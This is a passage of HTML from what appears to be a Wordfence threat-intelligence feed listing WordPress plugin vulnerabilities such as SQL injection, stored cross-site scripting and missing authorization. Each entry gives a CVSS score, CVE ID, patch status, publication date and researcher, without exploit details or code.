<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener">Bao &#8211; BlueRock</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/daa5e6a7-91ff-4dd0-aec2-f9a13e38f309" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/00130f32-36eb-4a76-bac5-b6407edf1c48" target="_blank" rel="noopener">WP Social Ninja – Embed Social Feeds, User Reviews &amp; Chat Widgets &lt;= 4.3.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65521" target="_blank" rel="noopener noreferrer">							CVE-2026-65521						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-social-reviews" target="_blank" rel="noopener">WP Social Ninja – Embed Social Feeds, User Reviews &amp; Chat Widgets</a> <span class="wfvr-software-slug">[wp-social-reviews]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/00130f32-36eb-4a76-bac5-b6407edf1c48" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bfcbd6fb-f599-4a85-aabb-d03d2716ba00" target="_blank" rel="noopener">YT Player – Embed and Customize Video Players &lt;= 2.0.9 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27422" target="_blank" rel="noopener noreferrer">							CVE-2026-27422						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yt-player" target="_blank" rel="noopener">Video Player for YouTube – embed videos your visitors will love to watch</a> <span class="wfvr-software-slug">[yt-player]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e80ce9dc8cd55ea122ada90f882b7d82.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e80ce9dc8cd55ea122ada90f882b7d82"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener">Que Thanh Tuan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bfcbd6fb-f599-4a85-aabb-d03d2716ba00" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/affe1bab-e534-4c79-a057-6b1268437575" target="_blank" rel="noopener">Ziina &lt;= 1.2.21 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59554" target="_blank" rel="noopener noreferrer">							CVE-2026-59554						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ziina" target="_blank" rel="noopener">Ziina</a> <span class="wfvr-software-slug">[ziina]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/affe1bab-e534-4c79-a057-6b1268437575" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2fda47d8-8e8c-4103-aabb-c70935e13450" target="_blank" rel="noopener">Ninja Forms &lt;= 3.14.9 &#8211; Authenticated (Administrator+) SQL Injection via Import File &#8216;settings&#8217; Key</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15663" target="_blank" rel="noopener noreferrer">							CVE-2026-15663						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms" target="_blank" rel="noopener">Ninja Forms – The Contact Form Builder That Grows With You</a> <span class="wfvr-software-slug">[ninja-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2fda47d8-8e8c-4103-aabb-c70935e13450" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df67e870-d600-46d3-88cc-058d8b9d30c9" target="_blank" rel="noopener">Sender – Newsletter, SMS and Email Marketing Automation for WooCommerce &lt;= 2.10.22 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59537" target="_blank" rel="noopener noreferrer">							CVE-2026-59537						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sender-net-automated-emails" target="_blank" rel="noopener">Sender – Newsletter, SMS and Email Marketing Automation for WooCommerce</a> <span class="wfvr-software-slug">[sender-net-automated-emails]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df67e870-d600-46d3-88cc-058d8b9d30c9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/10543a3b-e1ac-4c6b-b511-4cbd45924f6f" target="_blank" rel="noopener">Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin &lt;= 7.3.2 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65462" target="_blank" rel="noopener noreferrer">							CVE-2026-65462						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uncanny-automator" target="_blank" rel="noopener">Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin</a> <span class="wfvr-software-slug">[uncanny-automator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/10543a3b-e1ac-4c6b-b511-4cbd45924f6f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d5264a1-dabf-4630-9871-ab6e14817768" target="_blank" rel="noopener">WPForms &lt;= 2.0.0.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via OptinMonster Integration data-sitekey Attribute in Post Content</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15782" target="_blank" rel="noopener noreferrer">							CVE-2026-15782						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforms-lite" target="_blank" rel="noopener">WPForms – AI Form Builder for WordPress – Contact Forms, Payment Forms, Survey Form, Quiz &amp; More</a> <span class="wfvr-software-slug">[wpforms-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asaf-mozes" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e4a8b174c9f284d94094cf7722e1ec31.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e4a8b174c9f284d94094cf7722e1ec31"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asaf-mozes" target="_blank" rel="noopener">Asaf Mozes</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d5264a1-dabf-4630-9871-ab6e14817768" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44f7c455-7d1f-44c0-b2dc-828b1b740a46" target="_blank" rel="noopener">افزونه پیامک ووکامرس Persian WooCommerce SMS &lt;= 7.2.2 &#8211; Authenticated (Shop manager+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65532" target="_blank" rel="noopener noreferrer">							CVE-2026-65532						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-woocommerce-sms" target="_blank" rel="noopener">افزونه پیامک ووکامرس Persian WooCommerce SMS</a> <span class="wfvr-software-slug">[persian-woocommerce-sms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44f7c455-7d1f-44c0-b2dc-828b1b740a46" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4810251f-7d87-4fed-8673-ff3519c7b0af" target="_blank" rel="noopener">Abandoned Cart Lite for WooCommerce &lt;= 6.8.0 &#8211; Authenticated (Shop manager+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65557" target="_blank" rel="noopener noreferrer">							CVE-2026-65557						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-abandoned-cart" target="_blank" rel="noopener">Abandoned Cart Lite for WooCommerce</a> <span class="wfvr-software-slug">[woocommerce-abandoned-cart]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4810251f-7d87-4fed-8673-ff3519c7b0af" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89f6fa65-ef71-491e-8959-591b58d1444c" target="_blank" rel="noopener">Brands for WooCommerce &lt;= 3.8.8 &#8211; Authenticated (Shop Manager+) Stored Cross-Site Scripting via &#8216;br_brand_tooltip&#8217; Term Meta Field</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15647" target="_blank" rel="noopener noreferrer">							CVE-2026-15647						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/brands-for-woocommerce" target="_blank" rel="noopener">Brands for WooCommerce</a> <span class="wfvr-software-slug">[brands-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89f6fa65-ef71-491e-8959-591b58d1444c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3c5349da-90bd-44a8-a61e-acd2c67cca32" target="_blank" rel="noopener">Photo Gallery – Responsive Image Galleries by Supsystic &lt;= 1.16.3 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-24628" target="_blank" rel="noopener noreferrer">							CVE-2026-24628						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gallery-by-supsystic" target="_blank" rel="noopener">Photo Gallery – Responsive Image Galleries by Supsystic</a> <span class="wfvr-software-slug">[gallery-by-supsystic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mrreee" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fa4bbc3f38e816243f092ee486e38350.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fa4bbc3f38e816243f092ee486e38350"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mrreee" target="_blank" rel="noopener">Mrreee</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3c5349da-90bd-44a8-a61e-acd2c67cca32" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/14baad86-ef7d-4d9c-b878-ea97f66b37a0" target="_blank" rel="noopener">Tabs Responsive – With WooCommerce Product Tabs Extension &lt;= 2.5 &#8211; Authenticated (Shop manager+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65550" target="_blank" rel="noopener noreferrer">							CVE-2026-65550						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tabs-responsive" target="_blank" rel="noopener">Tabs Responsive – With WooCommerce Product Tabs Extension</a> <span class="wfvr-software-slug">[tabs-responsive]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/14baad86-ef7d-4d9c-b878-ea97f66b37a0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ee86d33-5a1e-4dc5-b2f6-0beffd8a6b2e" target="_blank" rel="noopener">WP Encryption &lt;= 7.8.6.6 &#8211; Authenticated (Administrator+) Arbitrary File Write via &#8216;imploded&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15786" target="_blank" rel="noopener noreferrer">							CVE-2026-15786						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-letsencrypt-ssl" target="_blank" rel="noopener">WP Encryption – Lifetime Free SSL Cert &amp; HTTPS, Force SSL / HTTPS Redirect, SSL Security</a> <span class="wfvr-software-slug">[wp-letsencrypt-ssl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ee86d33-5a1e-4dc5-b2f6-0beffd8a6b2e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/541dae6d-209b-4216-ab7a-ddcd71a322cb" target="_blank" rel="noopener">WP-Polls &lt;= 2.77.3 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-68081" target="_blank" rel="noopener noreferrer">							CVE-2025-68081						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
